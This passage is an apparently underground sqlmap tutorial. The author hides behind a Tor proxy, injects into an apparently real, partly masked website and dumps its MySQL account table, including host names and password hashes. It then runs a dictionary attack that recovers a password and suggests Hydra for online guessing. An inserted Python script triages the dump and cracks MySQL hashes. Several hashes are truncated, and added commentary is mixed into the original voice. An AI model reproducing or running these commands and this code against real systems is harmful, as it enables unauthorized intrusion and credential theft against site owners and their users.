[18:48:03] [INFO] manual usage of GET payloads requires url encoding
[18:48:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[18:48:03] [INFO] fetching tables for database: mysql
[18:48:04] [INFO] the SQL query used returns 18 entries
[18:48:05] [INFO] retrieved: mysql
[18:48:05] [INFO] retrieved: user_info
[18:48:06] [INFO] retrieved: mysql
[18:48:07] [INFO] retrieved: user
[18:48:07] [INFO] retrieved: mysql
[18:48:08] [INFO] retrieved: time_zone_transition_type
[18:48:09] [INFO] retrieved: mysql
[18:48:09] [INFO] retrieved: time_zone_transition
[18:48:10] [INFO] retrieved: mysql
[18:48:10] [INFO] retrieved: time_zone_name
[18:48:11] [INFO] retrieved: mysql
[18:48:12] [INFO] retrieved: time_zone_leap_second
[18:48:12] [INFO] retrieved: mysql
[18:48:13] [INFO] retrieved: time_zone
[18:48:14] [INFO] retrieved: mysql
[18:48:14] [INFO] retrieved: tables_priv
[18:48:15] [INFO] retrieved: mysql
[18:48:16] [INFO] retrieved: procs_priv
[18:48:17] [INFO] retrieved: mysql
[18:48:17] [INFO] retrieved: proc
[18:48:18] [INFO] retrieved: mysql
[18:48:19] [INFO] retrieved: host
[18:48:19] [INFO] retrieved: mysql
[18:48:20] [INFO] retrieved: help_topic
[18:48:21] [INFO] retrieved: mysql
[18:48:29] [INFO] retrieved: help_relation
[18:48:30] [INFO] retrieved: mysql
[18:48:31] [INFO] retrieved: help_keyword
[18:48:31] [INFO] retrieved: mysql
[18:48:32] [INFO] retrieved: help_category
[18:48:33] [INFO] retrieved: mysql
[18:48:33] [INFO] retrieved: func
[18:48:34] [INFO] retrieved: mysql
[18:48:35] [INFO] retrieved: db
[18:48:35] [INFO] retrieved: mysql
[18:48:36] [INFO] retrieved: columns_priv
Database: mysql
[18 tables]
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
| user_info                 |
+---------------------------+

[18:48:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'

[*] shutting down at: 18:48:36

FINALLY!!!! We have found a useful table! While I would love to see an 'admin' table, the 'user' table does make me happy. Keep in mind that mysql.user is not an application table: it is MySQL's own account table, with one row per DBMS login (Host/User), that account's password hash in the Password column, and its global privileges (Select_priv, File_priv, Super_priv, Grant_priv and so on). The web application's database user should never be able to read it; that it can here means the account was set up with far more privilege than the application needs. (sqlmap's --users, --passwords and --privileges options read exactly these columns, so they are a shortcut for what we do next by hand.)

Now that we have found a good table we need to pull the columns in it, and maybe we will find some passwords as well! We are going to add the following options to our command line:

-D mysql -> use database mysql
-T user -> use table user
--dump -> dump every row (all columns) of table user

Okay, here is what our command line will look like now...
root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" -D mysql -T user --dump

[banner and legal disclaimer as above]

[*] starting at: 18:49:04

[18:49:04] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13
[18:49:05] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
[18:49:05] [INFO] resuming injection data from session file
[18:49:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[18:49:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[injection points as above]
[18:49:17] [INFO] manual usage of GET payloads requires url encoding
[18:49:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[18:49:17] [INFO] fetching columns for table 'user' on database 'mysql'
[18:49:18] [INFO] the SQL query used returns 37 entries
[18:49:18] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
[18:49:20] [INFO] retrieved: max_user_connections
[18:49:22] [INFO] retrieved: int(11) unsigned
[18:49:23] [INFO] retrieved: max_connections
[18:49:24] [INFO] retrieved: int(11) unsigned
[18:49:25] [INFO] retrieved: max_updates
[18:49:27] [INFO] retrieved: int(11) unsigned
[18:49:28] [INFO] retrieved: max_questions
[18:49:30] [INFO] retrieved: int(11) unsigned
[18:49:31] [INFO] retrieved: x509_subject
[18:49:34] [INFO] retrieved: blob

I HAVE REMOVED SOME OF THE OUTPUT HERE TO KEEP THE TUTORIAL SIZE DOWN!

[18:51:32] [INFO] retrieved: localhost
[18:51:33] [INFO] retrieved: root
[18:51:35] [INFO] retrieved: N
[18:51:37] [INFO] retrieved:
[18:51:38] [INFO] retrieved: *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B
[18:51:39] [INFO] retrieved: N
[18:51:41] [INFO] retrieved: N
[18:51:42] [INFO] retrieved: N
[18:51:46] [INFO] retrieved:
[18:51:47] [INFO] retrieved:
[18:51:49] [INFO] retrieved: N
[18:54:08] [INFO] retrieved: Y
[18:54:09] [INFO] retrieved: localhost
[18:54:11] [INFO] retrieved:
[18:54:12] [INFO] retrieved: Y
[18:54:14] [INFO] retrieved:
[18:54:15] [INFO] retrieved: *605A60BF6EFC17C157CF1E34F576F35BFD80
[18:54:16] [INFO] retrieved: Y
[18:57:28] [INFO] retrieved: projects
[18:57:29] [INFO] retrieved: Y
[18:57:31] [INFO] retrieved:
[18:57:33] [INFO] retrieved: *B012E8731FF1DF44F3D8B26837708985278C
[18:57:34] [INFO] retrieved: Y
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
[19:09:16] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[19:10:00] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!)
[y/N] N [19:10:13] [INFO] starting dictionary attack (mysql_passwd) [19:10:13] [INFO] found: 'password' for hash: '*e56a114692fe0de073f9a1dd68a00eeb9703' [19:10:13] [INFO] found: 'password' for user: 'projects' Database: mysql Table: user [25 entries] +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ | Alter_priv | Alter_routine_priv | Create_priv | Create_routine_priv | Create_tmp_table_priv | Create_user_priv | Create_view_priv | Delete_priv | Drop_priv | Execute_priv | File_priv | Grant_priv | Host | Index_priv | Insert_priv | Lock_tables_priv | max_connections | max_questions | max_updates | max_user_connections | Password | Process_priv | References_priv | Reload_priv | Repl_client_priv | Repl_slave_priv | Select_priv | Show_db_priv | Show_view_priv | Shutdown_priv | ssl_cipher | ssl_type | Super_priv | Update_priv | User | x509_issuer | x509_subject | 
+------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B8D5 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | root | NULL | NULL | | N | N | N | N | N | N | N | N | N | N | N | N | localhost | N | N | N | 0 | 0 | 0 | 0 | *CF9EBDBEB7E917593C84F8FA6CA1D13E289F5F | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | panel | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | localhost | Y | Y | N | 0 | 0 | 0 | 0 | *E784A49C8C7340D14CBFEC6181911832FB | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | localhost | Y | Y | Y | 0 | 0 | 0 | 0 | *605A60BF6EFC17C157CF1E34F576F35B | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | NULL | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | ic-earth-ny.indexcopernicus.com | Y | Y | Y | 0 | 0 | 0 | 0 | *6A511966616CD43C35166A81BC2AC01F7 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | root | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | ic-earth-ny.indexcopernicus.com | Y | Y | N | 0 | 0 | 0 | 0 | *E56A114692FE0DE073F9A1DD68A00EEB9703F3 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | NULL | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 
10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *5917878B1F04F5E4B9815B2056B340F87CD477 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | root | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *B012E8731FF1DF44F3D8B26837708985278C3C | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | projects | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | 10.11.12.1 | Y | Y | Y | 0 | 0 | 0 | 0 | *7742916D8C9524F7826938F0A5F1FB499 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | panel | NULL | NULL | | N | N | N | N | N | N | N | N | N | N | N | N | 10.11.12.1 | N | N | N | 0 | 0 | 0 | 0 | *16F2DA51526C51873E29386679D394E20ADA48 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | lowersuser | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *854BA136D598D180847EC4689EB51C618239A | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL | +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ [19:10:20] [INFO] Table 'mysql.user' dumped to CSV file '/pentest/database/sqlmap/output/www.indexHIDEN.com/dump/mysql/user.csv' [19:10:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 19:10:20 YES!!!! 
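Before the commentary, here is what the two things sqlmap just did (dump the privilege table, then offer a dictionary attack using the hash method it calls 'mysql_passwd') amount to if you do them yourself against the user.csv it wrote. This is an example added for this page, not the tutorial's or sqlmap's own code. The CSV rows, the wordlist and every hash other than the one for 'password' are constructed, and the column subset is assumed to match the layout of sqlmap's user.csv.

```python
"""
Post-dump triage for a sqlmap dump of mysql.user (added example, not from the
tutorial or from sqlmap).

  1. flag the accounts that matter for takeover: empty passwords, FILE
     (needed for LOAD_FILE()/INTO OUTFILE and therefore for --os-shell
     style attacks), SUPER, GRANT OPTION, and accounts allowed in remotely;
  2. run a wordlist attack on the Password column with the MySQL 4.1+
     scheme that sqlmap labels 'mysql_passwd':
         '*' + SHA1(SHA1(password)).hex().upper()
     with optional suffixes, like sqlmap's "common password suffixes" prompt.
"""
import csv
import hashlib
import io

# Constructed rows in sqlmap's CSV layout (a subset of the 37 mysql.user columns).
# '*DEADBEEF...' is a made-up 40-hex-digit hash; '*16F2...ADA48' is deliberately
# shorter than a real hash, like the hashes the tutorial's author cut short.
SAMPLE_CSV = """Host,User,Password,File_priv,Super_priv,Grant_priv
localhost,root,*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19,Y,Y,Y
localhost,panel,,N,N,N
localhost,,*DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF,Y,Y,Y
10.11.12.1,projects,*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19,Y,N,N
10.11.12.1,lowersuser,*16F2DA51526C51873E29386679D394E20ADA48,N,N,N
"""

# Constructed wordlist standing in for /pentest/database/sqlmap/txt/wordlist.txt.
WORDLIST = ["123456", "projects", "password", "letmein"]


def mysql_passwd(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' then upper-hex SHA1 of the raw SHA1 digest."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_mysql41_hash(value: str) -> bool:
    """41 chars: '*' plus 40 hex digits. Anything else (pre-4.1 16-hex format,
    a truncated dump) cannot be verified with this scheme."""
    body = value[1:]
    return (len(value) == 41 and value.startswith("*")
            and all(c in "0123456789ABCDEFabcdef" for c in body))


def account(row: dict) -> str:
    # mysql.user allows an empty User: that is the anonymous account.
    return f"{row['User'] or '<anonymous>'}@{row['Host']}"


def load_dump(text: str) -> list:
    return list(csv.DictReader(io.StringIO(text)))


def triage(rows: list) -> list:
    """Return (account, finding) pairs to read before anything else."""
    findings = []
    for r in rows:
        acct = account(r)
        if r["Password"] == "":
            findings.append((acct, "empty password"))
        if r["File_priv"] == "Y":
            findings.append((acct, "FILE privilege"))
        if r["Super_priv"] == "Y":
            findings.append((acct, "SUPER privilege"))
        if r["Grant_priv"] == "Y":
            findings.append((acct, "GRANT OPTION"))
        if r["Host"] not in ("localhost", "127.0.0.1", "::1"):
            findings.append((acct, f"remote login from {r['Host']}"))
    return findings


def crack(rows: list, wordlist: list, suffixes=("",)) -> dict:
    """Dictionary attack. Maps account -> recovered password, or None when the
    hash is not in the list. Rows whose hash is empty or not a 41-char MySQL
    4.1 hash are skipped: there is nothing there to verify against."""
    # Hash each candidate once, then look every dumped row up in the table.
    table = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            table[mysql_passwd(candidate)] = candidate
    results = {}
    for r in rows:
        h = r["Password"].upper()
        if not is_mysql41_hash(h):
            continue
        results[account(r)] = table.get(h)
    return results


if __name__ == "__main__":
    rows = load_dump(SAMPLE_CSV)
    for acct, why in triage(rows):
        print(f"[triage] {acct}: {why}")
    for acct, pw in crack(rows, WORDLIST, suffixes=("", "1", "123", "!")).items():
        print(f"[crack]  {acct}: {pw if pw else 'not in wordlist'}")
```

Read the triage output first: FILE on an account that can log in remotely is the difference between a data leak and a shell, and an anonymous account holding every privilege is a finding on its own. The hash-format check matters for this page in particular: the hashes printed above were cut short by the author, and a cracker that silently compares against a truncated string will never match anything.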
Okay, as you can see, sqlmap was able to pull the login names and the password hashes out of mysql.user. Two things worth knowing about that run: the injection points were reported "with a total of 0 HTTP(s) requests" because sqlmap resumed the injection data from the session file it saved on the earlier run, so nothing had to be re-tested; and the three injection points it lists are the classic MySQL trio, a boolean-based blind (8517=8517), the error-based duplicate-entry technique (the FLOOR(RAND(0)*2) ... GROUP BY trick, where CHAR(58,110,111,114,58) and CHAR(58,103,97,109,58) are sqlmap's ':nor:' and ':gam:' markers that delimit the extracted value inside the error message), and a SLEEP(5) time-based blind. The Password column holds hashes, not encrypted passwords: on MySQL 5.0 the '*'-prefixed values are SHA1(SHA1(password)), the scheme sqlmap labels 'mysql_passwd'. When sqlmap recognises hash values in the dump it asks whether we want to run a dictionary attack on them (a wordlist attack, not an exhaustive brute force), and of course we choose yes!!! NOTE: I have removed a lot of the users and have deleted a good chunk of the hashes, and I will not be posting passwords in this tutorial, sorry!

Can you now see why this is such a great tool! For those of you who have been doing your SQL injection attacks manually, I hope you can now see the value in it! We now have login names and passwords that we can use against our target! And if you get unlucky and are not able to crack a hash (sqlmap only finds what is in the wordlist), you are still lucky in knowing which login names exist on the target, and you could use an app like THC-Hydra to guess passwords for those login names online. Just a suggestion...

Okay, very quickly I will go over one last option with sqlmap for now because I am getting tired... the option: --wizard. The --wizard option does not give you a GUI; it gives you a simple question-driven interface in the terminal that builds the command-line options for you. Here is a quick example...

root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --wizard

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 19:51:46

POST data (--data) [Enter for None]: --data
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 3
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 8517=8517

Again, 0 requests because the injection point was resumed from the session file. One caveat on the wizard: at the "POST data (--data)" prompt, just press Enter for a plain GET target like this one; whatever you type there is sent as the POST body, so typing "--data" as above is not what you want.

Okay, well, I hope you have found this tutorial helpful, and I will be adding more later, I promise. I will get into more details. Also, I plan to have a tutorial out on sqlninja! Be on the lookout for that. Well, I hope it helps! Take care my brothers... BIG SHOUTS TO ANONYMOUS... irc.anonymous.li #antisec Tutorial by gh0st